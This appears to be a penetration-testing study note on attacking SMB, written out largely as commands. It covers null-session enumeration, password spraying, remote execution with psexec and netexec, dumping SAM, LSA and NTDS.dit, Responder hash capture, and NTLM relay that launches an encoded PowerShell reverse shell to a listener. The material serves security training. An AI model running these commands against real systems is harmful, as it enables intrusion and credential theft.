> See SMB Footprinting notes for more details: [[5 - CPTS Notes/2 - Footprinting Module/Service Enumeration/SMB (139,445)|SMB (139,445)]] # Introduction - Server Message Block (SMB) was designed to run on top of NetBIOS over TCP/IP (NBT) using TCP port 139 and UDP ports 137, 138 - With the release Windows 2000, Microsoft added the option to run SMB directly over TCP/IP on port 445 without the extra NetBIOS layer - Samba is a Unix/Linux-based open-source implementation of the SMB protocol - Another protocol commonly related to SMB: MSRPC - RPC provides an application developer a generic way to execute a procedure (a.k.a. a function) in a local or remote process without having to understand the network protocols used to support the communication, as specified in [MS-RPCE](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/290c38b1-92fe-4229-91e6-4fc376610c15), which defines an RPC over SMB Protocol that can use SMB Protocol named pipes as its underlying transport - We can abuse misconfiguration or excessive privileges, exploit known vulnerabilities or discover new vulnerabilities # Enumeration ```bash sudo nmap <target_ip> -sV -sC -p139,445 ``` # Misconfigurations - SMB can be configured to not require authentication, which is called a null session - SMB techniques: ```bash smbclient -N -L //<target_ip> #attempts a null session and lists shares smbclient //<target_ip> -U <user_name> smbclient //<target_ip> --user <user_name>%'<password>' #connect with specified user and password smbmap -H <target_ip> #attempts a null session and lists shares smbmap -H <target_ip> -r notes #recursively lists the contents of a specirfied directory smbmap -H <target_ip> --download "notes\note.txt" #downloads a file smbmap -H <target_ip> --upload test.txt "notes\test.txt" #uploads a file nxc smb <target_ip> -u '' -p '' --shares --verbose #attempt null session and list shares nxc smb <target_ip> -u <username> -p <password> --shares #shows shares and perms for user nxc smb <target_ip> -u <username> -p <password> --spider share #shows contents of share nxc smb <target_ip> -u <username> -p <password> --get-file remote_loc local_dest nxc smb <target_ip> -u <username> -p <password> --put-file local_file remote_dest ``` - RPC technique ```bash rpcclient -U'%' <target_ip> #attempts a null session rpcclient gt; enumdomusers #list user name and associated RIDs ``` - `Enum4linux` technique - Leverages `nmblookup`, `net`, `rpcclient`, and `smbclient` ```bash enum4linux-ng <target_ip> -A -C ``` ![[images/Pasted image 20251016120550.png]] # SMB Attacks ## Brute Forcing & Password Spraying ```bash nxc smb <target_ip> -u <username/list> -p <password/list> ``` ```bash #nxc smb flags --local-auth #use for non-domain joined computer --continue-on-success #try all permutations available after a hit --no-bruteforce #sequentially try line_1:line_1 from user_list:password_list, and so on ``` ## Remote Code Execution (RCE) - [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) is a tool that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually - Uses a Windows service image inside of its executable - `PsExec` takes this service and deploys it to the admin$ share (by default) on the remote machine - Then, `PsExec`uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API - Next, `PsExec` starts the PSExec service on the remote machine - This service then creates a [named pipe](https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes) that can send commands to the system - `PsExec` can be downloaded from the Microsoft website - Several Linux implementations also exist: - `impacket-psexec` - `impacket-smbexec` - `impacket-atexec` - `netexec` - `metasploit psexec` ```bash impacket-psexec -h #shows help menu for psexec impacket-psexec administrator:'password'@<target_ip> #connects to the remote machine with a cmd prompt ``` ```bash netexec smb <target_ip> -u Administrator -p 'Password123!' #tests admin login netexec smb <target_ip> -u Administrator -H <hash> #test admin login with PtH netexec smb <target_ip> -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec #excutes the whoami command against target machine using smbexec netexec smb <target_ip> -u Administrator -p 'Password123!' --loggedon-users #enumerate current users netexec smb <target_ip> -u Administrator -p 'Password123!' --sam #dumps sam netexec smb <target_ip> -u Administrator -p 'Password123!' --lsa #dumps LSA netexec smb <target_ip> -u Administrator -p 'Password123!' --NTDS #dumps NTDS.dit via RPC if target is a DC netexec smb <target_ip> -u Administrator -p 'Password123!' --NTDS VSS #dumps NTDS.dit via VSS if target is a DC ``` ## Forced Authentication Attacks - Abuse SMB protrocl by creating a fake SMB server to capture NetNLTMv1/v2 hashes - Common tool for this purpose is `Responder` - LLMNR (link-local multicast name resolution), NBT-NS (NetBIOS Name Service), and MDNS (multicast domain name resolution) poisoner tool with different capabilities, one of them is the possibility to set up fake services, including SMB, to steal NetNTLM v1/v2 hashes. - In its default configuration, `Responder` will find LLMNR and NBT-NS traffic. - Then, `Responder` will respond on behalf of the servers the victim is looking for and capture their NetNTLM hashes - Suppose a user mistyped a shared folder's name `\\mysharefoder\` instead of `\\mysharedfolder\` - In this case, all name resolutions will fail because the name does not exist, and the machine will send a multicast query to all devices on the network, including us running our fake SMB server - This is a problem because no measures are taken to verify the integrity of the responses. Attackers can take advantage of this mechanism by listening in on such queries and spoofing responses, leading the victim to believe malicious servers are trustworthy - This trust is usually used to steal credentials ```bash #create a fake smbserver with default config on the given interface sudo responder -I ens33 ``` - If you notice multiples hashes for one account this is because NTLMv2 utilizes both a client-side and server-side challenge that is randomized for each interaction - Captured hashes can be cracked with `hashcat` mode 5600 -  If we cannot crack the hash, we can potentially relay the captured hash to another machine using [impacket-ntlmrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) or Responder [MultiRelay.py](https://github.com/lgandx/Responder/blob/master/tools/MultiRelay.py) - Generate a PowerShell base64 encoded revshell back to Kali host with [https://www.revshells.com](https://www.revshells.com/) ```bash nc -lvnp 9001 #setup listener on Kali host before above relaying of ``` ```bash cat /etc/responder/Responder.conf | grep 'SMB =' #confirm that SMB=Off in responder config file impacket-ntlmrelayx --no-http-server -smb2support -t <target_ip> #dumps SAM hashes by default but we can execute command with -c flag impacket-ntlmrelayx --no-http-server -smb2support -t <target_ip> -c 'powershell -e <powershell_based64_encoded_revshell>' ```